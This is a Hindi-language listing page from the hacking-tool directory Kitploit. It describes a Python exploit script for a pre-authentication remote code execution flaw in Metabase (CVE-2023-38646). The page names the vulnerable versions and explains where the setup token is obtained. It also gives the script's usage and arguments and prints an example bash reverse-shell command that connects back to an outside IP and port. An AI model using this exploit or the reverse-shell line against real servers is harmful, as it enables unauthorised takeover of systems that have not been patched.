Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-38646 — Metabase में Pre-Auth RCE (CVE-2023-38646) के लिए Exploit स्क्रिप्ट | Kitploit
उपकरण/GitHubGitHub/pyr0sec/cve-2023-38646
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरिमोट एक्सेस टूल
GitHubpyr0sec/cve-2023-38646

CVE-2023-38646

Metabase में Pre-Auth RCE (CVE-2023-38646) के लिए Exploit स्क्रिप्ट

रिपॉजिटरी देखें
1122 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Metabase Pre-Auth RCE (CVE-2023-38646) POC

यह एक पायथन स्क्रिप्ट है जो Metabase के लॉगिन सॉफ़्टवेयर की रिमोट कोड एक्ज़ीक्यूशन कमजोरी का फायदा उठाती है। यह हमें प्रमाणीकरण से पहले सर्वर पर मनमाने आदेशों को निष्पादित करने की अनुमति देती है।

असुरक्षित संस्करण हैं: Metabase ओपन सोर्स 0.46.6.1 से पहले और Metabase Enterprise 1.46.6.1 से पहले

उपयोग

root@kitploit:~
python3 exploit.py -u URL -t TOKEN -c COMMAND

आर्गुमेंट्स

root@kitploit:~
-h, --help            यह सहायता संदेश दिखाएं और बाहर निकलें
-u URL, --url URL     लक्ष्य URL
-t TOKEN, --token TOKEN
                      /api/session/properties में मिला सेटअप-टोकन
-c COMMAND, --command COMMAND
                      लक्ष्य होस्ट पर निष्पादित किया जाने वाला आदेश

उदाहरण

image

उपयोग किया गया आदेश: bash -i >& /dev/tcp/10.10.14.26/9001 0>&1

सन्दर्भ

Chaining our way to Pre-Auth RCE in Metabase (CVE-2023-38646)

टूल डाउनलोड करें